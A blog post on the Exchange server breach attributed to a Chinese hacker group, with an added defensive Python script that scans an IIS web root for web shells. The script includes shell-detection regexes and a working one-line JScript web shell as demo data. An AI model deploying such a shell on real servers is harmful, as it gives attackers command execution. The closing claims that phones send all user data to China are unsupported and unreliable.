Yep, if you thought the “Velvet Sweatshop,” as their employees call Microsoft, was in the clear after plugging holes in the mega security breach of SolarWinds, you would be wrong. Yesterday, I saw this article reporting another huge security breach, this time by China. (FYI, as far as I know, no one has taken credit for SolarWinds.)
The quiet release of an out-of-band patch for a flaw in Microsoft’s Exchange server is rapidly turning into a major story, with credible reports of at least 30,000 organizations in the USA, and possibly hundreds of thousands around the world, being hacked by a Chinese hacker group, who now has full control of the servers and the data on them.
Microsoft Exchange flaw may have led to 30,000+ US organizations being hacked
For those who don’t know, Microsoft Exchange is Microsoft’s flagship email server software.
Krebs on Security reports that a significant number of small businesses, towns, cities and local governments have been infected, with the hackers leaving behind a web shell for further command and control.
Microsoft said the original attacks were targeted at a range of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs, but Krebs notes that there has been a dramatic and aggressive escalation of the rate of infection, as the hackers try to stay ahead of the patch Microsoft released.
“We’ve worked on dozens of cases so far where web shells were put on the victim system back on Feb. 28 [before Microsoft announced its patches], all the way up to today,” said Volexity President Steven Adair, who discovered the attack. “Even if you patched the same day Microsoft published its patches, there’s still a high chance there is a web shell on your server. The truth is, if you’re running Exchange and you haven’t patched this yet, there’s a very high chance that your organization is already compromised.”
“It’s police departments, hospitals, tons of city and state governments and credit unions,” said one source who’s working closely with federal officials on the matter. “Just about everyone who’s running self-hosted Outlook Web Access and wasn’t patched as of a few days ago got hit with a zero-day attack.”
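The practical point in Adair’s quote is that the patch closes the hole but does nothing about a web shell that was already dropped, so patched servers still need to be searched. As an added example (my own code, not code from the original post, Krebs, Volexity or Microsoft), here is a small Python triage script that walks an Exchange web root and flags ASP.NET script files that either match generic web-shell idioms or were modified after a cutoff date. The directory layout (owa\auth, aspnet_client), the file names and both sample pages are constructed for the demo, and the indicator patterns are generic one-liner shell idioms I chose, not published indicators for this incident.

```python
"""Triage scan for web-shell-like ASP.NET files under an IIS/Exchange web root.

Added example. Everything below (directory names, sample pages, patterns) is
constructed for illustration and is not taken from the article or from any
vendor guidance.
"""
import os
import re
import tempfile
import time

# Assumption: these are generic idioms of minimal ASP/ASP.NET web shells
# (eval over a request parameter, "unsafe" JScript eval flag, process spawn).
SHELL_PATTERNS = {
    "eval_request":   re.compile(r'eval\s*\(\s*Request', re.I),
    "request_item":   re.compile(r'Request\.Item\s*\[', re.I),
    "unsafe_flag":    re.compile(r'"unsafe"', re.I),
    "process_start":  re.compile(r'System\.Diagnostics\.Process|Process\.Start\s*\(', re.I),
    "execute_global": re.compile(r'\bExecute(Global)?\s*\(', re.I),
    "jscript_page":   re.compile(r'Language\s*=\s*"?jscript"?', re.I),
}
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp"}


def score_file(path):
    """Return (score, matched_pattern_names) for one file; score counts distinct hits."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read(1_000_000)  # shells are tiny; cap the read anyway
    except OSError:
        return 0, []
    hits = [name for name, rx in SHELL_PATTERNS.items() if rx.search(text)]
    return len(hits), hits


def scan_for_web_shells(root, modified_after=None, min_score=1):
    """Walk `root` and return findings for script files that match shell idioms,
    or that were modified after `modified_after` (epoch seconds) if given.

    Recently modified files with score 0 are expected noise right after a
    patch (the patch rewrites files too); the content score is the stronger
    signal. On Windows st_ctime is creation time and can be used instead."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            mtime = os.stat(path).st_mtime
            score, hits = score_file(path)
            recent = modified_after is not None and mtime >= modified_after
            if score >= min_score or recent:
                findings.append({"path": path, "score": score, "hits": hits,
                                 "recent": recent, "mtime": mtime})
    findings.sort(key=lambda f: (-f["score"], -f["mtime"]))
    return findings


# Constructed sample pages: a benign-looking logon page and a one-line shell.
BENIGN_PAGE = ('<%@ Page Language="C#" AutoEventWireup="true" '
               'CodeBehind="logon.aspx.cs" Inherits="Owa.Logon" %>\n'
               '<html><body><form runat="server">'
               '<asp:Label runat="server" Text="Sign in" /></form></body></html>\n')
SHELL_PAGE = '<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>\n'


def build_demo_tree():
    """Create a throwaway tree imitating an Exchange web root (assumed layout)."""
    root = tempfile.mkdtemp(prefix="exchange-demo-")
    owa = os.path.join(root, "owa", "auth")
    client = os.path.join(root, "aspnet_client")
    os.makedirs(owa)
    os.makedirs(client)
    benign = os.path.join(owa, "logon.aspx")
    shell = os.path.join(client, "help.aspx")  # constructed file name
    with open(benign, "w", encoding="utf-8") as fh:
        fh.write(BENIGN_PAGE)
    with open(shell, "w", encoding="utf-8") as fh:
        fh.write(SHELL_PAGE)
    # Backdate the benign page so it looks like it shipped with the install.
    old = time.time() - 90 * 86400
    os.utime(benign, (old, old))
    return root, benign, shell


def demo(days_back=14):
    """Scan the demo tree with a cutoff `days_back` days ago; returns findings."""
    root, _benign, _shell = build_demo_tree()
    return scan_for_web_shells(root, modified_after=time.time() - days_back * 86400)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['score']:>2} recent={f['recent']} {f['path']} {f['hits']}")
```

On a real server you would point `scan_for_web_shells` at the IIS web root with a cutoff a little before the earliest date you believe the shells were placed, then review anything with a non-zero score first; a zero-score hit that is merely recent is usually a file the patch itself rewrote, but it still deserves a glance.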
Folks, this is a really big deal but unless you read tech blogs, I doubt you’ve heard about this. Again, this breach includes schools, police departments, hospitals, financial institutions, and businesses. I encourage you to read the article which I linked above. I suspect we will hear more about this breach before long. Oh, and if you don’t, that doesn’t mean everything is better.
Don’t forget that whatever the outcome of this most recent breach, your smartphones are sending all your text messages, address books, location, and other data to both China and Big Tech on a regular basis. Your privacy is an illusion in a digitally dependent world. How people use the information they are collecting is probably above my pay grade. If knowledge is power, then we’re likely in trouble…